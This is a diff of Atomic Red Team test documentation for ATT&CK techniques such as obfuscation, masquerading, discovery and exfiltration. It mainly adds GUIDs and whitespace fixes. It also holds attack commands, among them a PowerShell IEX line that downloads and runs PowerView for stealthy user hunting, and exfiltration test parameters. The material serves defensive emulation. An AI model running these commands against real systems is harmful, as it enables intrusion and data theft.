-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|
 
@@ -94,10 +102,14 @@ No other protection/compression were applied.
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|
 
@@ -130,10 +142,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|
 

atomics/T1027.004/T1027.004.md

@@ -20,10 +20,14 @@ Upon execution an exe named T1027.004.exe will be placed in the temp folder
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output compiled binary | Path | C:\Windows\Temp\T1027.004.exe|
 | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs|
@@ -47,7 +51,7 @@ del #{output_file} >nul 2>&1
 ##### Description: C# file must exist on disk at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1} 
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -70,10 +74,14 @@ Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe|
 
@@ -92,7 +100,7 @@ Invoke-Expression #{input_file}
 ##### Description: exe file must exist on disk at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1} 
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1027/T1027.md

@@ -33,6 +33,10 @@ Upon successful execution, sh will execute art.sh, which is a base64 encoded com
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
+
+
+
 
 
 
@@ -62,10 +66,14 @@ Upon successful execution, powershell will execute an encoded command and stdout
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
 
@@ -97,10 +105,14 @@ Upon successful execution, powershell will execute encoded command and read/writ
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
 | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
@@ -138,10 +150,14 @@ Mimic execution of compressed executable. When successfully executed, calculator
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|
 
@@ -166,7 +182,7 @@ del /Q "%temp%\T1027.zip" >nul 2>nul
 ##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} 
+if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -188,10 +204,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
 | sender | sender email | string | test@corp.com|
@@ -221,10 +241,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
 | ip_address | Destination IP address | string | 127.0.0.1|

atomics/T1030/T1030.md

@@ -15,10 +15,14 @@ Take a file/directory, split it into 5Mb chunks
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | File name | Path | T1030_urandom|
 | folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
@@ -43,7 +47,7 @@ if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
 ##### Description: The file must exist for the test to run.
 ##### Check Prereq Commands:
 ```sh
-if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; 
+if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```sh

atomics/T1033/T1033.md

@@ -24,10 +24,14 @@ Additionally, two files will be written to disk - computers.txt and usernames.tx
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of remote computer | string | localhost|
 
@@ -62,6 +66,10 @@ Upon successful execution, sh will stdout list of usernames.
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
+
+
+
 
 
 
@@ -88,6 +96,10 @@ Find existing user session on other computers. Upon execution, information about
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
+
+
+
 
 
 
@@ -95,6 +107,7 @@ Find existing user session on other computers. Upon execution, information about
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
 ```
 

atomics/T1033/T1033.yaml

@@ -48,5 +48,6 @@ atomic_tests:
   - windows
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
     name: powershell

atomics/T1036.003/T1036.003.md

@@ -33,6 +33,10 @@ Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest,
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
+
+
+
 
 
 
@@ -64,6 +68,10 @@ Upon successful execution, sh is renamed to `crond` and executed.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
+
+
+
 
 
 
@@ -95,6 +103,10 @@ Upon successful execution, cscript.exe is renamed as notepad.exe and executed fr
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
+
+
+
 
 
 
@@ -126,6 +138,10 @@ Upon execution, no windows will remain open but wscript will have been renamed t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
+
+
+
 
 
 
@@ -157,6 +173,10 @@ Upon successful execution, powershell.exe is renamed as taskhostw.exe and execut
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
+
+
+
 
 
 
@@ -188,10 +208,14 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
 | inputfile | path of file to copy | path | PathToAtomicsFolder\T1036.003\bin\T1036.003.exe|
@@ -217,7 +241,7 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
 ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inputfile}) {exit 0} else {exit 1} 
+if (Test-Path #{inputfile}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -237,10 +261,14 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
 | inputfile | path of file to copy | path | $env:ComSpec|
@@ -276,6 +304,10 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
+
+
+
 
 
 
@@ -308,10 +340,14 @@ e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_path | path to exe to use when creating masquerading files | path | C:\Windows\System32\calc.exe|
 | vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs|

atomics/T1036.004/T1036.004.md

@@ -19,6 +19,10 @@ Creating W32Time similar named service (win32times) using schtasks just like thr
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
+
+
+
 
 
 
@@ -48,6 +52,10 @@ Creating W32Time similar named service (win32times) using sc just like threat ac
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
+
+
+
 
 
 

atomics/T1036.005/T1036.005.md

@@ -0,0 +1,51 @@
+# T1036.005 - Match Legitimate Name or Location
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
+<blockquote>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
+
+Adversaries may also use the same icon of the file they are trying to mimic.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+
+
+<br/>
+
+## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
+Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+mkdir $HOME/...
+cp $(which sh) $HOME/...
+$HOME/.../sh -c "echo #{test_message}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f $HOME/.../sh
+rmdir $HOME/.../
+```
+
+
+
+
+
+<br/>

atomics/T1036.005/T1036.005.yaml

@@ -0,0 +1,30 @@
+---
+attack_technique: T1036.005
+display_name: 'Masquerading: Match Legitimate Name or Location'
+
+atomic_tests:
+- name: Execute a process from a directory masquerading as the current parent directory.
+  auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+  description: |
+    Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+  supported_platforms:
+    - macos
+    - linux
+
+  input_arguments:
+    test_message:
+      description: Test message to echo out to the screen
+      type: String
+      default: Hello from the Atomic Red Team test T1036.005#1
+
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      mkdir $HOME/...
+      cp $(which sh) $HOME/...
+      $HOME/.../sh -c "echo #{test_message}"
+    cleanup_command: |
+      rm -f $HOME/.../sh
+      rmdir $HOME/.../

atomics/T1036.006/T1036.006.md

@@ -19,6 +19,10 @@ Space After Filename
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
+
+
+
 
 
 #### Run it with these steps! 

atomics/T1036/T1036.md

@@ -17,6 +17,10 @@ It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a n
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+
+
+
 
 
 

atomics/T1037.001/T1037.001.md

@@ -18,10 +18,14 @@ that can be viewed in the Registry Editor.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_path | Path to .bat file | String | %temp%\art.bat|
 | script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt|

atomics/T1037.002/T1037.002.md

@@ -17,6 +17,10 @@ Mac logon script
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
+
+
+
 
 
 #### Run it with these steps! 

atomics/T1037.004/T1037.004.md

@@ -27,6 +27,10 @@ Modify rc.common
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
+
+
+
 
 
 
@@ -51,6 +55,10 @@ Modify rc.common
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+
+
+
 
 
 
@@ -83,6 +91,10 @@ Modify rc.local
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
+
+
+
 
 
 

atomics/T1037.005/T1037.005.md

@@ -21,6 +21,10 @@ Modify or create an file in /Library/StartupItems
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
+
+
+
 
 
 

atomics/T1040/T1040.md

@@ -27,10 +27,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | ens33|
 
@@ -50,7 +54,7 @@ tshark -c 5 -i #{interface}
 ##### Description: Check if at least one of the tools are installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; 
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -71,10 +75,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | en0A|
 
@@ -94,7 +102,7 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
 ##### Description: Check if at least one of the tools are installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; 
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -116,10 +124,14 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | Ethernet|
 | wireshark_url | wireshark installer download URL | url | https://1.eu.dl.wireshark.org/win64/Wireshark-win64-3.4.5.exe|
@@ -142,7 +154,7 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 ##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
 ##### Check Prereq Commands:
 ```powershell
-if (test-path "#{tshark_path}") {exit 0} else {exit 1} 
+if (test-path "#{tshark_path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -152,7 +164,7 @@ Start-Process $env:temp\wireshark_installer.exe /S
 ##### Description: npcap must be installed.
 ##### Check Prereq Commands:
 ```powershell
-if (test-path "#{npcap_path}") {exit 0} else {exit 1} 
+if (test-path "#{npcap_path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -173,6 +185,10 @@ After execution you should find a file named trace.etl and trace.cab in the temp
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
+
+
+
 
 
 

atomics/T1046/T1046.md

@@ -25,6 +25,10 @@ Upon successful execution, sh will perform a network connection against a single
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
+
+
+
 
 
 
@@ -54,10 +58,14 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host | Host to scan. | string | 192.168.1.1|
 | port | Ports to scan. | string | 80|
@@ -80,7 +88,7 @@ nc -nv #{host} #{port}
 ##### Description: Check if nmap command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -99,10 +107,14 @@ Scan ports to check for listening ports for the local host 127.0.0.1
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe|
 | host_to_scan | The host to scan with NMap | string | 127.0.0.1|
@@ -122,7 +134,7 @@ nmap #{host_to_scan}
 ##### Description: NMap must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} 
+if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -142,10 +154,14 @@ Scan ports to check for listening ports with python
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host_ip | Host to scan. | string | 127.0.0.1|
 | filename | Location of the project file | Path | PathToAtomicsFolder\T1046\src\T1046.py|
@@ -165,7 +181,7 @@ python #{filename} -i #{host_ip}
 ##### Description: Check if python exists on the machine
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1} 
+if (python --version) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1047/T1047.md

@@ -32,6 +32,10 @@ When the test completes , there should be local user accounts information displa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
+
+
+
 
 
 
@@ -57,6 +61,10 @@ When the test completes , there should be running processes listed on the comman
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
+
+
+
 
 
 
@@ -82,6 +90,10 @@ When the test completes, there should be a list of installed patches and when th
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
+
+
+
 
 
 
@@ -110,10 +122,14 @@ if the provided remote host is unreacheable
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | String | 127.0.0.1|
 | service_search_string | Name Of Service | String | Spooler|
@@ -141,10 +157,14 @@ When the test completes , a new process will be started locally .A notepad appli
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_to_execute | Name or path of process to execute. | String | notepad.exe|
 
@@ -176,10 +196,14 @@ A common error message is "Node - (provided IP or default)  ERROR Description =T
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | String | 127.0.0.1|
 | user_name | Username | String | DOMAIN\Administrator|
@@ -218,6 +242,10 @@ You should expect to see notepad.exe running after execution of this test.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
+
+
+
 
 
 
@@ -243,10 +271,14 @@ This test tries to mask process creation by creating a new class that inherits f
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | new_class | Derived class name | String | Win32_Atomic|
 | process_to_execute | Name or path of process to execute. | String | notepad.exe|

atomics/T1048.003/T1048.003.md

@@ -27,6 +27,10 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
+
+
+
 
 
 #### Run it with these steps! 
@@ -61,10 +65,14 @@ Upon successful execution, powershell will utilize ping (icmp) to exfiltrate not
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
 | ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
@@ -91,6 +99,10 @@ Exfiltration of specified file over DNS protocol.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
+
+
+
 
 
 #### Run it with these steps! 
@@ -122,10 +134,14 @@ Upon successful execution, powershell will invoke web request using POST method
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe|
 | ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1|
@@ -154,10 +170,14 @@ Upon successful execution, powershell will send an email with attached file to e
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe|
 | sender | The email address of the sender | String | test@corp.com|

atomics/T1048/T1048.md

@@ -25,10 +25,14 @@ Upon successful execution, sh will spawn ssh contacting a remote domain (default
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | target SSH domain | url | target.example.com|
 
@@ -58,10 +62,14 @@ Upon successful execution, tar will compress /Users/* directory and password pro
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username for domain | string | atomic|
 | password | password for user | string | atomic|

atomics/T1049/T1049.md

@@ -27,6 +27,10 @@ Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net se
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5
+
+
+
 
 
 
@@ -55,6 +59,10 @@ Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. R
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a
+
+
+
 
 
 
@@ -81,6 +89,10 @@ Upon successful execution, sh will execute `netstat` and `who -a`. Results will
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
+
+
+
 
 
 
@@ -99,7 +111,7 @@ who -a
 ##### Description: Check if netstat command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -120,10 +132,14 @@ Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true|
 | SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder&#92;T1049&#92;bin&#92;SharpView.exe|
@@ -146,7 +162,7 @@ foreach ($syntax in $syntaxList) {
 ##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView})
 ##### Check Prereq Commands:
